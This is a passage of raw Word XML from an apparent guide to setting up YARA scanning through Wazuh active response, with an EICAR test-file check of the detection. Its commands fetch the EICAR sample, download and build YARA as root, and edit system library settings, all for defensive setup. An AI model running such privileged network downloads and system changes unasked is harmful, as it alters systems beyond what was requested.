        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0D153A10" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t>&lt;ossec_config&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02614298" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">  &lt;command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68447F55" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">    &lt;name&gt;yara_windows&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26D5CFFA" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">    &lt;executable&gt;yara.bat&lt;/executable&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73986A1B" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">    &lt;timeout_allowed&gt;no&lt;/timeout_allowed&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392B882B" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">  &lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5613A4EC" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4AAAE0A1" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">  &lt;active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="187853BD" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">    &lt;disabled&gt;no&lt;/disabled&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B312591" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">    &lt;command&gt;yara_windows&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077B1674" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">    &lt;location&gt;local&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18190D66" w14:textId="09F1E670" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">    &lt;rules_id&gt;</w:t>
            </w:r>
            <w:r w:rsidR="005748D2">
              <w:t>554,550</w:t>
            </w:r>
            <w:r w:rsidRPr="002B20EF">
              <w:t>&lt;/rules_id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1423D0CF" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t xml:space="preserve">  &lt;/active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7738DC2F" w14:textId="3D0E4501" w:rsidR="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t>&lt;/ossec_config&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3292CD01" w14:textId="77777777" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC70438" w14:textId="04234651" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B20EF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Restart the Wazuh manager to apply the configuration change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2B20EF" w:rsidRPr="001E2C55" w14:paraId="70AF29BB" w14:textId="77777777" w:rsidTr="002B20EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="556DCF1B" w14:textId="1F259A8F" w:rsidR="002B20EF" w:rsidRPr="002B20EF" w:rsidRDefault="002B20EF" w:rsidP="002B20EF">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B20EF">
              <w:t>sudo systemctl restart wazuh-manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09F83265" w14:textId="77777777" w:rsidR="00192EF2" w:rsidRDefault="00192EF2" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01496637" w14:textId="77777777" w:rsidR="005748D2" w:rsidRPr="005748D2" w:rsidRDefault="005748D2" w:rsidP="005748D2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005748D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Test the configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B32712E" w14:textId="6937A48E" w:rsidR="009E19B2" w:rsidRDefault="009E19B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E19B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Place the eicar.com file into the FIM-monitored directory (C:\projects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C780D" w14:textId="31D4E7A9" w:rsidR="00FF09D9" w:rsidRPr="00FF09D9" w:rsidRDefault="00FF09D9" w:rsidP="00FF09D9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF09D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download the EICAR zip file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14766012" w14:textId="46FB0E23" w:rsidR="00FF09D9" w:rsidRPr="00FF09D9" w:rsidRDefault="00FF09D9" w:rsidP="00FF09D9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF09D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Invoke-WebRequest -Uri https://secure.eicar.org/eicar_com.zip -OutFile eicar.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB03C9C" w14:textId="77777777" w:rsidR="00FF09D9" w:rsidRDefault="00FF09D9" w:rsidP="00FF09D9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF09D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Unzip it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BFDE1F" w14:textId="3385B652" w:rsidR="00FF09D9" w:rsidRPr="00FF09D9" w:rsidRDefault="00FF09D9" w:rsidP="00FF09D9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF09D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Expand-Archive .\eicar.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5392F69E" w14:textId="77777777" w:rsidR="00FF09D9" w:rsidRDefault="00FF09D9" w:rsidP="00FF09D9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF09D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Copy the EICAR file to the monitored directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1246BC" w14:textId="6361E843" w:rsidR="00FF09D9" w:rsidRPr="00FF09D9" w:rsidRDefault="00FF09D9" w:rsidP="00FF09D9">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF09D9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cp .\eicar\eicar.com C:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>projects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792CA93B" w14:textId="7F606B53" w:rsidR="009E19B2" w:rsidRPr="009E19B2" w:rsidRDefault="009E19B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E19B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Expected Result in Wazuh UI: The following alerts should appear in quick succession:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41652D20" w14:textId="2EFEDDCA" w:rsidR="009E19B2" w:rsidRPr="009E19B2" w:rsidRDefault="009E19B2" w:rsidP="009E19B2">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E19B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Rule 554: File added to the system. (The trigger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618105A8" w14:textId="77777777" w:rsidR="009E19B2" w:rsidRDefault="009E19B2" w:rsidP="009E19B2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E19B2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Rule 108001 (Level 12): File "c:\projects\eicar.com" is a positive match. Yara rule: SUSP_Just_EICAR_RID2C24. (The final detection alert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB12C7" w14:textId="77777777" w:rsidR="00FF09D9" w:rsidRPr="009E19B2" w:rsidRDefault="00FF09D9" w:rsidP="00FF09D9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grilledutableau"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10456"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E19B2" w14:paraId="059B8621" w14:textId="77777777" w:rsidTr="009E19B2">
        <w:trPr>
          <w:trHeight w:val="3010"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4916AA99" w14:textId="34F0C924" w:rsidR="009E19B2" w:rsidRDefault="009E19B2" w:rsidP="003276E6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0045C3B6" wp14:editId="44434CAE">
                  <wp:extent cx="6469609" cy="2737013"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
                  <wp:docPr id="21004411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0685" cy="2775543"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17717D41" w14:textId="77777777" w:rsidR="007A7178" w:rsidRDefault="007A7178" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7DEB3B" w14:textId="77777777" w:rsidR="00853252" w:rsidRPr="00853252" w:rsidRDefault="00853252" w:rsidP="00853252">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853252">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ubuntu Endpoint Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743C435E" w14:textId="620172C6" w:rsidR="00853252" w:rsidRPr="00110652" w:rsidRDefault="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110652">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download, compile, and install YARA</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rsidRPr="001E2C55" w14:paraId="2BED2CE7" w14:textId="77777777" w:rsidTr="00110652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="42CE9024" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo apt update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="097C8734" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo apt install -y make gcc autoconf libtool libssl-dev pkg-config</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="095B8C5E" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo curl -LO https://github.com/VirusTotal/yara/archive/v4.2.3.tar.gz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1824A7A6" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo tar -xvzf v4.2.3.tar.gz -C /usr/local/bin/ &amp;&amp; rm -f v4.2.3.tar.gz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5140594E" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>cd /usr/local/bin/yara-4.2.3/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F08A0F" w14:textId="2CAEE28C" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo ./bootstrap.sh &amp;&amp; sudo ./configure &amp;&amp; sudo make &amp;&amp; sudo make install &amp;&amp; sudo make check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E074D46" w14:textId="77777777" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7362713B" w14:textId="35A6B879" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110652">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Test that YARA is running properly : yara</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B844E" w14:textId="26117F78" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110652">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>If the error message below is displayed:</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14:paraId="123B47ED" w14:textId="77777777" w:rsidTr="00110652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="69A3B2C3" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo su</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480DD568" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>echo "/usr/local/lib" &gt;&gt; /etc/ld.so.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C3D2EDA" w14:textId="55C0C634" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>ldconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C1E7F63" w14:textId="77777777" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62740248" w14:textId="31D23E6B" w:rsidR="00110652" w:rsidRDefault="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00110652">
        <w:t>Download YARA detection rule</w:t>
      </w:r>
      <w:r>
        <w:t>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14:paraId="44BDEF41" w14:textId="77777777" w:rsidTr="00110652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="20E57941" w14:textId="487D39AB" w:rsidR="00110652" w:rsidRPr="001E2C55" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E2C55">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo mkdir -p </w:t>
            </w:r>
            <w:r w:rsidR="00540CD3" w:rsidRPr="001E2C55">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>/var/ossec/etc/yara/rules/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E69894F" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>sudo curl 'https://valhalla.nextron-systems.com/api/v1/get' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C5553E" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A64188C" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>-H 'Accept-Language: en-US,en;q=0.5' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0E715A" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>--compressed \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E1F4FE6" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>-H 'Referer: https://valhalla.nextron-systems.com/' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12493254" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>-H 'Content-Type: application/x-www-form-urlencoded' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D1C7917" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>-H 'DNT: 1' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="685E2026" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t>--data 'demo=demo&amp;apikey=1111111111111111111111111111111111111111111111111111111111111111&amp;format=text' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59EBC3A8" w14:textId="5FF74B48" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
              <w:t xml:space="preserve">-o </w:t>
            </w:r>
            <w:r w:rsidR="00540CD3" w:rsidRPr="00540CD3">
              <w:t>/var/ossec/etc/yara/rules/yara_rules.yar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CF3A6B7" w14:textId="77777777" w:rsidR="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673B89AC" w14:textId="7BC61D4D" w:rsidR="00110652" w:rsidRDefault="00110652">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00110652">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Create a /var/ossec/active-response/bin/yara.sh file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D442D87" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pP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rsidRPr="001E2C55" w14:paraId="4A1F5AD1" w14:textId="77777777" w:rsidTr="00110652">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="47E3C2FF" w14:textId="77777777" w:rsidR="00110652" w:rsidRPr="00110652" w:rsidRDefault="00110652" w:rsidP="00110652">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00110652">
